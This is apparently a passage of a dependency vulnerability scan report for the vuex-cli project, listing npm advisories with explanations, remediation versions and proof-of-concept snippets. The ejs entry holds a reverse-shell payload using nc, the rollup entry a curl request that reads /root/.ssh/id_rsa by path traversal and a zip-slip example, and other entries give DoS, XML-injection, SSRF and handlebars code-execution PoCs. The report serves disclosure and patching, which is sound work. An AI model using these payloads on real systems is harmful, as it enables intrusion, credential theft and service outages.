$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade minimatch to version 3.1.3, 4.2.4, 5.1.7, 6.2.1, 7.4.7, 8.0.5, 9.0.6, 10.2.1 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: qs
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 codecov@1.0.1 request@2.88.2 qs@6.5.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 koa-proxy@0.6.0 co-request@0.2.1 request@2.88.2 qs@6.5.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 request@2.88.2 qs@6.5.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-github@0.14.14 request@2.88.2 qs@6.5.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 request@2.88.2 qs@6.5.5

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via improper enforcement of the arrayLimit option in bracket notation parsing. An attacker can exhaust server memory and cause application unavailability by submitting a large number of bracket notation parameters - like a[]=1&a[]=2 - in a single HTTP request.

PoC


const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Remediation

Upgrade qs to version 6.14.1 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: whet.extend
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 whet.extend@0.9.9
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 whet.extend@0.9.9

Overview

whet.extend is an A sharped version of port of jQuery.extend that actually works on node.js

Affected versions of this package are vulnerable to Prototype Pollution due to improper user input sanitization when using the extend and _findValue functions.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

There is no fixed version for whet.extend.

References

high severity
new

Uncontrolled Recursion

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to Uncontrolled Recursion in the recursive processing of deeply nested XML documents by several DOM-related operations, including normalize, serializeToString, getElementsByTagName, getElementsByTagNameNS, getElementsByClassName, getElementById, cloneNode, importNode, textContent, and isEqualNode. An attacker can cause the application to crash or become unresponsive by submitting a valid, deeply nested XML payload that triggers uncontrolled recursion and stack exhaustion.

PoC

const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const depth = 5000;
const xml = '<a>'.repeat(depth) + '</a>'.repeat(depth);
const doc = new DOMParser().parseFromString(xml, 'text/xml');
new XMLSerializer().serializeToString(doc);
// RangeError: Maximum call stack size exceeded

Remediation

A fix was pushed into the master branch but not yet published.

References

high severity
new

XML Injection

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection due to unvalidated comment serialization. When an application uses the package to create an XML comment from untrusted user input, the package fails to sanitize comment-breaking sequences (like -->). An attacker can input --> to terminate the comment prematurely. Once the comment is broken out of, any text the attacker places after the --> is treated as "live" XML markup by the serializer rather than harmless comment text.

PoC

const { DOMImplementation, DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);

doc.documentElement.appendChild(
  doc.createComment('--><injected attr="1"/><!--')
);

const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <root><!----><injected attr="1"/><!----></root>

const reparsed = new DOMParser().parseFromString(xml, 'text/xml');
console.log(reparsed.documentElement.childNodes.item(1).nodeName);
// injected

Remediation

A fix was pushed into the master branch but not yet published.

References

high severity
new

XML Injection

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection in the serialization of DocumentType nodes when attacker-controlled values are provided to the publicId, systemId, or internalSubset fields. An attacker can inject arbitrary XML markup into the serialized output by supplying specially crafted input to these fields, potentially leading to the injection of malicious DOCTYPE declarations or markup outside the intended context.

Note:

This is only exploitable if untrusted data is passed programmatically to createDocumentType or written directly to the relevant properties and then serialized without enabling strict validation.

Workaround

This vulnerability can be mitigated by passing the option { requireWellFormed: true } to XMLSerializer.serializeToString() to enforce validation of the affected fields.

Remediation

A fix was pushed into the master branch but not yet published.

References

high severity
new

XML Injection

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection via the createProcessingInstruction function. An attacker can inject arbitrary XML nodes into the serialized output by supplying specially crafted data containing the PI-closing sequence, which is not validated or neutralized during serialization. This can alter the structure and meaning of generated XML documents, potentially impacting workflows that store, forward, sign, or parse XML.

Note:

This is only exploitable if the serialization is performed without passing the { requireWellFormed: true } option.

PoC

const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'r', null);
doc.documentElement.appendChild(
    doc.createProcessingInstruction('a', '?><z/><?q ')
);
console.log(new XMLSerializer().serializeToString(doc));
// <r><?a ?><z/><?q ?></r>
//          ^^^^ injected <z/> element is active markup

Remediation

A fix was pushed into the master branch but not yet published.

References

high severity

Arbitrary Code Injection

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Arbitrary Code Injection due the improper validation of options.imports key names in _.template. An attacker can execute arbitrary code at template compilation time by injecting malicious expressions. If Object.prototype has been polluted, inherited properties may also be copied into the imports object and executed.

Notes:

  1. Version 4.18.0 was intended to fix this vulnerability but it got deprecated due to introducing a breaking functionality issue.

  2. This issue is due to the incomplete fix for CVE-2021-23337.

Remediation

Upgrade lodash to version 4.18.1 or higher.

References

high severity

Directory Traversal

  • Vulnerable module: rollup
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 systemjs-builder@0.16.13 rollup@0.58.2

Overview

rollup is a Next-generation ES module bundler

Affected versions of this package are vulnerable to Directory Traversal in the Bundle class in bundle.ts, which handles file name sanitization in the core engine. An attacker can overwrite arbitrary files on the host filesystem outside the application root by supplying malicious output filenames containing traversal sequences through CLI named inputs, manual chunk aliases, or malicious plugins. This can allow further attacks in which critical system or user configuration files are read and executed in unintended ways.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

  • Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

  • Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade rollup to version 2.80.0, 3.30.0, 4.59.0 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to Prototype Pollution through the copy() function in dom.js. Exploiting this vulnerability is possible via the p variable.

DISPUTED This vulnerability has been disputed by the maintainers of the package. Currently the only viable exploit that has been demonstrated is to pollute the target object (rather then the global object which is generally the case for Prototype Pollution vulnerabilities) and it is yet unclear if this limited attack vector exposes any vulnerability in the context of this package.

See the linked GitHub Issue for full details on the discussion around the legitimacy and potential revocation of this vulnerability.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

There is no fixed version for xmldom.

References

high severity

Improper minification of non-boolean comparisons

  • Vulnerable module: uglify-js
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0 uglify-js@2.3.6
    Remediation: Open PR to patch uglify-js@2.3.6.

Overview

uglify-js is a JavaScript parser, minifier, compressor and beautifier toolkit.

Tom MacWright discovered that UglifyJS versions 2.4.23 and earlier are affected by a vulnerability which allows a specially crafted Javascript file to have altered functionality after minification. This bug was demonstrated by Yan to allow potentially malicious code to be hidden within secure code, activated by minification.

Details

In Boolean algebra, DeMorgan's laws describe the relationships between conjunctions (&&), disjunctions (||) and negations (!). In Javascript form, they state that:

 !(a && b) === (!a) || (!b)
 !(a || b) === (!a) && (!b)

The law does not hold true when one of the values is not a boolean however.

Vulnerable versions of UglifyJS do not account for this restriction, and erroneously apply the laws to a statement if it can be reduced in length by it.

Consider this authentication function:

function isTokenValid(user) {
    var timeLeft =
        !!config && // config object exists
        !!user.token && // user object has a token
        !user.token.invalidated && // token is not explicitly invalidated
        !config.uninitialized && // config is initialized
        !config.ignoreTimestamps && // don't ignore timestamps
        getTimeLeft(user.token.expiry); // > 0 if expiration is in the future

    // The token must not be expired
    return timeLeft > 0;
}

function getTimeLeft(expiry) {
  return expiry - getSystemTime();
}

When minified with a vulnerable version of UglifyJS, it will produce the following insecure output, where a token will never expire:

( Formatted for readability )

function isTokenValid(user) {
    var timeLeft = !(                       // negation
        !config                             // config object does not exist
        || !user.token                      // user object does not have a token
        || user.token.invalidated           // token is explicitly invalidated
        || config.uninitialized             // config isn't initialized
        || config.ignoreTimestamps          // ignore timestamps
        || !getTimeLeft(user.token.expiry)  // > 0 if expiration is in the future
    );
    return timeLeft > 0
}

function getTimeLeft(expiry) {
    return expiry - getSystemTime()
}

Remediation

Upgrade UglifyJS to version 2.4.24 or higher.

References

high severity

Remote Code Execution (RCE)

  • Vulnerable module: ejs
  • Introduced through: ejs@2.7.4

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli ejs@2.7.4
    Remediation: Upgrade to ejs@3.1.7.

Overview

ejs is a popular JavaScript templating engine.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options parameter of renderFile, which makes it possible to inject code into outputFunctionName.

Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.

PoC:

Creation of reverse shell:

http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s

Remediation

Upgrade ejs to version 3.1.7 or higher.

References

high severity

Arbitrary Code Execution

  • Vulnerable module: handlebars
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 handlebars@1.3.0

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Arbitrary Code Execution. The package's lookup helper doesn't validate templates correctly, allowing attackers to submit templates that execute arbitrary JavaScript in the system.

PoC

    {{#with split as |a|}}
        {{pop (push "alert('Vulnerable Handlebars JS');")}}
        {{#with (concat (lookup join (slice 0 1)))}}
            {{#each (slice 2 3)}}
                {{#with (apply 0 a)}}
                    {{.}}
                {{/with}}
            {{/each}}
        {{/with}}
    {{/with}}
{{/with}}

Remediation

Upgrade handlebars to version 3.0.8, 4.5.3 or higher.

References

high severity

Arbitrary Code Execution

  • Vulnerable module: js-yaml
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 js-yaml@3.7.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-svgo@2.1.6 svgo@0.7.2 js-yaml@3.7.0
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 js-yaml@3.4.5

Overview

js-yaml is a human-friendly data serialization language.

Affected versions of this package are vulnerable to Arbitrary Code Execution. When an object with an executable toString() property used as a map key, it will execute that function. This happens only for load(), which should not be used with untrusted data anyway. safeLoad() is not affected because it can't parse functions.

Remediation

Upgrade js-yaml to version 3.13.1 or higher.

References

high severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: ip
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 ip@1.1.9

Overview

ip is a Node library.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the ip.isPublic() and ip.isPrivate() functions. An attacker can interact with internal network resources by supplying specially crafted IP address such as octal localhost format ("017700000001") that is incorrectly identified as public.

Note:

This issue exists because of an incomplete fix for CVE-2024-29415.

PoC

Test octal localhost bypass:

node -e "const ip=require('ip'); console.log('017700000001 bypass:', ip.isPublic('017700000001'));" - returns true

Remediation

There is no fixed version for ip.

References

high severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: ip
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 ip@1.1.9

Overview

ip is a Node library.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the ip.isPublic() and ip.isPrivate() functions. An attacker can interact with internal network resources by supplying specially crafted IP address such as null route ("0") that is being incorrectly identified as public.

Note: This issue exists because of an incomplete fix for CVE-2024-29415.

Exploit is only possible if the application and operating system interpret connection attempts to 0 or 0.0.0.0 as connections to 127.0.0.1.

PoC

Test null route bypass:

node -e "const ip=require('ip'); console.log('0 bypass:', ip.isPublic('0'));" - returns true

Remediation

There is no fixed version for ip.

References

high severity

XML Injection

  • Vulnerable module: xmldom
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 directory-encoder@0.7.2 img-stats@0.5.2 xmldom@0.1.31

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection via the XMLSerializer() function. An attacker can manipulate the structure and integrity of generated XML documents by injecting attacker-controlled markup containing the CDATA terminator ]]> through CDATA section content, which is not properly validated or sanitized during serialization. This can result in unauthorized XML elements or attributes being inserted, potentially leading to business logic manipulation or privilege escalation in downstream consumers.

Remediation

There is no fixed version for xmldom.

References

high severity

Excessive Platform Resource Consumption within a Loop

  • Vulnerable module: braces
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 anymatch@1.3.2 micromatch@2.3.11 braces@1.8.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 anymatch@1.3.2 micromatch@2.3.11 braces@1.8.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 sane@1.7.0 anymatch@1.3.2 micromatch@2.3.11 braces@1.8.5
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 braces@2.3.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10 braces@2.3.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 readdirp@2.2.1 micromatch@3.1.10 braces@2.3.2
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 liftoff@2.5.0 findup-sync@2.0.0 micromatch@3.1.10 braces@2.3.2

Overview

braces is a Bash-like brace expansion, implemented in JavaScript.

Affected versions of this package are vulnerable to Excessive Platform Resource Consumption within a Loop due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.

PoC

const { braces } = require('micromatch');

console.log("Executing payloads...");

const maxRepeats = 10;

for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats*90000);

  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} 

Remediation

Upgrade braces to version 3.0.3 or higher.

References

high severity

Prototype Pollution

  • Vulnerable module: loader-utils
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-loader@6.4.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 extract-text-webpack-plugin@1.0.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 file-loader@0.9.0 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 html-webpack-plugin@2.30.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 imports-loader@0.6.5 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-loader@0.9.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-style-loader@1.0.0 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 loader-utils@0.2.17

Overview

Affected versions of this package are vulnerable to Prototype Pollution in parseQuery function via the name variable in parseQuery.js. This pollutes the prototype of the object returned by parseQuery and not the global Object prototype (which is the commonly understood definition of Prototype Pollution). Therefore, the actual impact will depend on how applications utilize the returned object and how they filter unwanted keys.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
